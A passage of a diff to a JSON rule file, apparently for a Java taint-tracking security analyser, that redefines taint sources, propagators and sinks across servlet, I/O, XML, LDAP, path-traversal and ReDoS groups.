@@ -6405,22 +6536,22 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "", + "track": "false", "untags": [], - "value": "javax.xml.transform.sax.SAXSource.(org.xml.sax.InputSource)" + "value": "java.io.PipedInputStream.receive(byte[],int,int)" }, { - "command": "", + "command": "INSERT(0,P2,P3)", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P2", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "O", - "track": "", + "track": "false", "untags": [], - "value": "javax.xml.transform.sax.SAXSource.(org.xml.sax.XMLReader,org.xml.sax.InputSource)" + "value": "java.io.PipedReader.read(char[],int,int)" }, { "command": "", @@ -6431,9 +6562,9 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "", + "track": "false", "untags": [], - "value": "javax.xml.transform.sax.SAXSource.setInputSource(org.xml.sax.InputSource)" + "value": "java.io.PipedReader.receive(char[],int,int)" }, { "command": "", @@ -6446,46 +6577,46 @@ "target": "O", "track": "", "untags": [], - "value": "javax.xml.transform.stream.StreamSource.(java.io.File)" + "value": "java.io.PushbackInputStream.(java.io.InputStream,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "P1", + "track": "false", "untags": [], - "value": "javax.xml.transform.stream.StreamSource.(java.io.InputStream)" + "value": "java.io.PushbackInputStream.read(byte[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "P1", + "track": "false", "untags": [], - "value": "javax.xml.transform.stream.StreamSource.(java.io.InputStream,java.lang.String)" + "value": "java.io.Reader.read(char[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "P1", + "track": "false", "untags": [], - "value": "javax.xml.transform.stream.StreamSource.(java.io.Reader)" + "value": "java.io.Reader.transferTo(java.io.Writer)" }, { "command": "", @@ -6498,149 +6629,144 @@ "target": "O", "track": "", "untags": [], - "value": "javax.xml.transform.stream.StreamSource.(java.io.Reader,java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "javax" - }, - { - "details": [ + "value": "java.io.StringReader.(java.lang.String)" + }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.ServletRequest.getInputStream()" + "value": "java.io.StringWriter.toString()" }, { - "command": "", + "command": "APPEND(P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", "untags": [], - "value": "jakarta.servlet.ServletRequest.getParameter(java.lang.String)" + "value": "java.io.StringWriter.write(char[],int,int)" }, { - "command": "", + "command": "APPEND()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", "untags": [], - "value": "jakarta.servlet.ServletRequest.getParameterNames()" + "value": "java.io.StringWriter.write(java.lang.String)" }, { - "command": "", + "command": "APPEND(P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", "untags": [], - "value": "jakarta.servlet.ServletRequest.getParameterValues(java.lang.String)" + "value": "java.io.StringWriter.write(java.lang.String,int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", - "track": "false", + "tags": [], + "target": "O", + "track": "", "untags": [], - "value": "jakarta.servlet.ServletRequest.getReader()" + "value": "java.net.Socket.(java.lang.String,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", + "track": "", + "untags": [], + "value": "java.net.Socket.getOutputStream()" + }, + { + "command": "REMOVE()", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "O", "track": "false", "untags": [], - "value": "javax.servlet.ServletRequest.getInputStream()" + "value": "org.apache.commons.io.output.ByteArrayOutputStream.reset()" }, { - "command": "", + "command": "APPEND(P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", "untags": [], - "value": "javax.servlet.ServletRequest.getParameter(java.lang.String)" - }, + "value": "org.apache.commons.io.output.ByteArrayOutputStream.write(byte[],int,int)" + } + ], + "enable": 1, + "type": 1, + "value": "io" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", - "track": "false", + "track": "", "untags": [], - "value": "javax.servlet.ServletRequest.getParameterMap()" + "value": "javax.xml.bind.JAXBElement.getValue()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", - "track": "false", + "track": "", "untags": [], - "value": "javax.servlet.ServletRequest.getParameterNames()" + "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.io.InputStream)" }, { "command": "", @@ -6649,123 +6775,176 @@ "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", - "track": "false", + "track": "", "untags": [], - "value": "javax.servlet.ServletRequest.getParameterValues(java.lang.String)" + "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.io.InputStream,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P2", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", - "track": "false", + "track": "", "untags": [], - "value": "javax.servlet.ServletRequest.getReader()" - } - ], - "enable": 1, - "type": 2, - "value": "javax.servlet.ServletRequest" - }, - { - "details": [ + "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.lang.String,java.io.InputStream)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P2", "stack_blacklist": [], - "tags": [ - "cross-site" - ], + "tags": [], "target": "R", - "track": "false", + "track": "", "untags": [], - "value": "jakarta.servlet.ServletRequest.getParameterMap()" + "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.lang.String,java.io.Reader)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", - "track": "false", + "track": "", "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getCookies()" + "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(javax.xml.transform.Source)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", - "track": "false", + "tags": [], + "target": "O", + "track": "", "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getHeader(java.lang.String)" + "value": "javax.xml.transform.sax.SAXSource.(org.xml.sax.InputSource)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P2", "stack_blacklist": [], - "tags": [ - "http-token-limited-chars" - ], - "target": "R", - "track": "false", + "tags": [], + "target": "O", + "track": "", "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getHeaderNames()" + "value": "javax.xml.transform.sax.SAXSource.(org.xml.sax.XMLReader,org.xml.sax.InputSource)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "cross-site" - ], - "target": "R", - "track": "false", + "tags": [], + "target": "O", + "track": "", "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getHeaders(java.lang.String)" + "value": "javax.xml.transform.sax.SAXSource.setInputSource(org.xml.sax.InputSource)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "", + "untags": [], + "value": "javax.xml.transform.stream.StreamSource.(java.io.File)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "", + "untags": [], + "value": "javax.xml.transform.stream.StreamSource.(java.io.InputStream)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "", + "untags": [], + "value": "javax.xml.transform.stream.StreamSource.(java.io.InputStream,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "", + "untags": [], + "value": "javax.xml.transform.stream.StreamSource.(java.io.Reader)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", "source": "P1", "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "", + "untags": [], + "value": "javax.xml.transform.stream.StreamSource.(java.io.Reader,java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "javax" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], "tags": [ "cross-site" ], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getParameter(java.lang.String)" + "value": "jakarta.servlet.ServletRequest.getInputStream()" }, { "command": "", @@ -6780,7 +6959,7 @@ "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getPart(java.lang.String)" + "value": "jakarta.servlet.ServletRequest.getParameter(java.lang.String)" }, { "command": "", @@ -6795,23 +6974,22 @@ "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getParts()" + "value": "jakarta.servlet.ServletRequest.getParameterNames()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ - "cross-site", - "xss-encoded" + "cross-site" ], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getQueryString()" + "value": "jakarta.servlet.ServletRequest.getParameterValues(java.lang.String)" }, { "command": "", @@ -6821,13 +6999,12 @@ "source": "O", "stack_blacklist": [], "tags": [ - "http-token-limited-chars", - "xss-encoded" + "cross-site" ], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.HttpServletRequest.getRequestedSessionId()" + "value": "jakarta.servlet.ServletRequest.getReader()" }, { "command": "", @@ -6836,11 +7013,13 @@ "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], + "tags": [ + "cross-site" + ], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.Part.getContentType()" + "value": "javax.servlet.ServletRequest.getInputStream()" }, { "command": "", @@ -6855,7 +7034,7 @@ "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.Part.getHeader(java.lang.String)" + "value": "javax.servlet.ServletRequest.getParameter(java.lang.String)" }, { "command": "", @@ -6865,19 +7044,19 @@ "source": "O", "stack_blacklist": [], "tags": [ - "http-token-limited-chars" + "cross-site" ], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.Part.getHeaderNames()" + "value": "javax.servlet.ServletRequest.getParameterMap()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [ "cross-site" @@ -6885,14 +7064,14 @@ "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.Part.getHeaders(java.lang.String)" + "value": "javax.servlet.ServletRequest.getParameterNames()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [ "cross-site" @@ -6900,7 +7079,7 @@ "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.Part.getInputStream()" + "value": "javax.servlet.ServletRequest.getParameterValues(java.lang.String)" }, { "command": "", @@ -6915,8 +7094,15 @@ "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.Part.getName()" - }, + "value": "javax.servlet.ServletRequest.getReader()" + } + ], + "enable": 1, + "type": 2, + "value": "javax.servlet.ServletRequest" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, @@ -6924,11 +7110,13 @@ "inherit": "true", "source": "O", "stack_blacklist": [], - "tags": [], + "tags": [ + "cross-site" + ], "target": "R", "track": "false", "untags": [], - "value": "jakarta.servlet.http.Part.getSubmittedFileName()" + "value": "jakarta.servlet.ServletRequest.getParameterMap()" }, { "command": "", @@ -6941,7 +7129,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getCookies()" + "value": "jakarta.servlet.http.HttpServletRequest.getCookies()" }, { "command": "", @@ -6956,7 +7144,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getHeader(java.lang.String)" + "value": "jakarta.servlet.http.HttpServletRequest.getHeader(java.lang.String)" }, { "command": "", @@ -6971,7 +7159,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getHeaderNames()" + "value": "jakarta.servlet.http.HttpServletRequest.getHeaderNames()" }, { "command": "", @@ -6986,7 +7174,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getHeaders(java.lang.String)" + "value": "jakarta.servlet.http.HttpServletRequest.getHeaders(java.lang.String)" }, { "command": "", @@ -7001,7 +7189,22 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getPart(java.lang.String)" + "value": "jakarta.servlet.http.HttpServletRequest.getParameter(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", + "untags": [], + "value": "jakarta.servlet.http.HttpServletRequest.getPart(java.lang.String)" }, { "command": "", @@ -7016,7 +7219,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getParts()" + "value": "jakarta.servlet.http.HttpServletRequest.getParts()" }, { "command": "", @@ -7032,7 +7235,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getQueryString()" + "value": "jakarta.servlet.http.HttpServletRequest.getQueryString()" }, { "command": "", @@ -7048,7 +7251,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.HttpServletRequest.getRequestedSessionId()" + "value": "jakarta.servlet.http.HttpServletRequest.getRequestedSessionId()" }, { "command": "", @@ -7061,7 +7264,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.Part.getContentType()" + "value": "jakarta.servlet.http.Part.getContentType()" }, { "command": "", @@ -7076,7 +7279,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.Part.getHeader(java.lang.String)" + "value": "jakarta.servlet.http.Part.getHeader(java.lang.String)" }, { "command": "", @@ -7091,7 +7294,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.Part.getHeaderNames()" + "value": "jakarta.servlet.http.Part.getHeaderNames()" }, { "command": "", @@ -7106,7 +7309,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.Part.getHeaders(java.lang.String)" + "value": "jakarta.servlet.http.Part.getHeaders(java.lang.String)" }, { "command": "", @@ -7121,7 +7324,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.Part.getInputStream()" + "value": "jakarta.servlet.http.Part.getInputStream()" }, { "command": "", @@ -7136,7 +7339,7 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.Part.getName()" + "value": "jakarta.servlet.http.Part.getName()" }, { "command": "", @@ -7149,96 +7352,317 @@ "target": "R", "track": "false", "untags": [], - "value": "javax.servlet.http.Part.getSubmittedFileName()" - } - ], - "enable": 1, - "type": 2, - "value": "javax.servlet.http.HttpServletRequest" - }, - { - "details": [ + "value": "jakarta.servlet.http.Part.getSubmittedFileName()" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", - "track": "", + "target": "R", + "track": "false", "untags": [], - "value": "java.sql.Connection.nativeSQL(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "jdbc" - }, - { - "details": [ + "value": "javax.servlet.http.HttpServletRequest.getCookies()" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P2", + "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "jakarta.naming.directory.DirContext.search(java.lang.String,java.lang.String,jakarta.naming.directory.SearchControls)" + "value": "javax.servlet.http.HttpServletRequest.getHeader(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P2", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", + "tags": [ + "http-token-limited-chars" + ], + "target": "R", + "track": "false", "untags": [], - "value": "jakarta.naming.directory.DirContext.search(java.lang.String,java.lang.String,java.lang.Object[],jakarta.naming.directory.SearchControls)" + "value": "javax.servlet.http.HttpServletRequest.getHeaderNames()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P2", + "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "jakarta.naming.directory.InitialDirContext.search(java.lang.String,java.lang.String,jakarta.naming.directory.SearchControls)" + "value": "javax.servlet.http.HttpServletRequest.getHeaders(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "true", + "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "javax.naming.directory.DirContext.search(java.lang.String,java.lang.String,java.lang.Object[],javax.naming.directory.SearchControls)" + "value": "javax.servlet.http.HttpServletRequest.getPart(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", + "untags": [], + "value": "javax.servlet.http.HttpServletRequest.getParts()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [ + "cross-site", + "xss-encoded" + ], + "target": "R", + "track": "false", + "untags": [], + "value": "javax.servlet.http.HttpServletRequest.getQueryString()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [ + "http-token-limited-chars", + "xss-encoded" + ], + "target": "R", + "track": "false", + "untags": [], + "value": "javax.servlet.http.HttpServletRequest.getRequestedSessionId()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "javax.servlet.http.Part.getContentType()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", + "untags": [], + "value": "javax.servlet.http.Part.getHeader(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [ + "http-token-limited-chars" + ], + "target": "R", + "track": "false", + "untags": [], + "value": "javax.servlet.http.Part.getHeaderNames()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", + "untags": [], + "value": "javax.servlet.http.Part.getHeaders(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", + "untags": [], + "value": "javax.servlet.http.Part.getInputStream()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", + "untags": [], + "value": "javax.servlet.http.Part.getName()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "javax.servlet.http.Part.getSubmittedFileName()" + } + ], + "enable": 1, + "type": 2, + "value": "javax.servlet.http.HttpServletRequest" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "", + "untags": [], + "value": "java.sql.Connection.nativeSQL(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "jdbc" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.naming.directory.DirContext.search(java.lang.String,java.lang.String,jakarta.naming.directory.SearchControls)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.naming.directory.DirContext.search(java.lang.String,java.lang.String,java.lang.Object[],jakarta.naming.directory.SearchControls)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.naming.directory.InitialDirContext.search(java.lang.String,java.lang.String,jakarta.naming.directory.SearchControls)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.naming.directory.DirContext.search(java.lang.String,java.lang.String,java.lang.Object[],javax.naming.directory.SearchControls)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", "track": "true", "untags": [], "value": "javax.naming.directory.DirContext.search(java.lang.String,java.lang.String,javax.naming.directory.SearchControls)" @@ -8089,253 +8513,837 @@ "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "base64-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "base64-decoded" + ], + "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[],int,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "base64-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "base64-decoded" + ], + "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[],int,int,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.owasp.html.PolicyFactory.sanitize(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "O", + "stack_blacklist": [], + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.owasp.validator.html.CleanResults.getCleanHTML()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "O", + "stack_blacklist": [], + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.owasp.validator.html.CleanResults.getCleanXMLDocumentFragment()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.owasp.validator.html.scan.AbstractAntiSamyScanner.scan(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "owasp-esapi" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.File.(java.io.File,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [ + "org.owasp.esapi.reference.DefaultValidator.isValidDirectoryPath", + "org.owasp.esapi.reference.DefaultValidator.isValidFileName" + ], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.File.(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.File.(java.lang.String,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.File.(java.net.URI)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.File.createTempFile(java.lang.String,java.lang.String,java.io.File)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.FileInputStream.(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.nio.file.FileSystem.getPath(java.lang.String,java.lang.String[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.nio.file.spi.FileSystemProvider.getFileSystem(java.net.URI)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.nio.file.spi.FileSystemProvider.newFileSystem(java.net.URI,java.util.Map)" + } + ], + "enable": 1, + "type": 4, + "value": "path-traversal" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [ + "org.springframework.web.util.UriComponentsBuilder.fromOriginHeader", + "org.springframework.web.util.UriComponentsBuilder.fromUriString", + "java.lang.String.replaceAll" + ], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.util.regex.Pattern.matcher(java.lang.CharSequence)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [ + "java.lang.String.replaceAll" + ], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jregex.Pattern.matcher(java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "redos" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "com.github.mustachejava.codes.ValueCode.execute(java.io.Writer,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "com.sun.faces.renderkit.html_basic.HtmlResponseWriter.write(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.servlet.ServletOutputStream.print(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + 